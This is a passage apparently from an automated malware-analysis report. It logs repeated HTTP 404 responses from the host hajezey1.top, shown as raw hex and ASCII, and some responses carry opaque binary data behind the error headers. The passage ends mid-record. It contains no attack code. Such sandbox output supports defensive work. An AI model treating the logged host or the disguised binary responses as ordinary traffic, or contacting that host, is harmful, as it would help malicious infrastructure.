3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 
57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 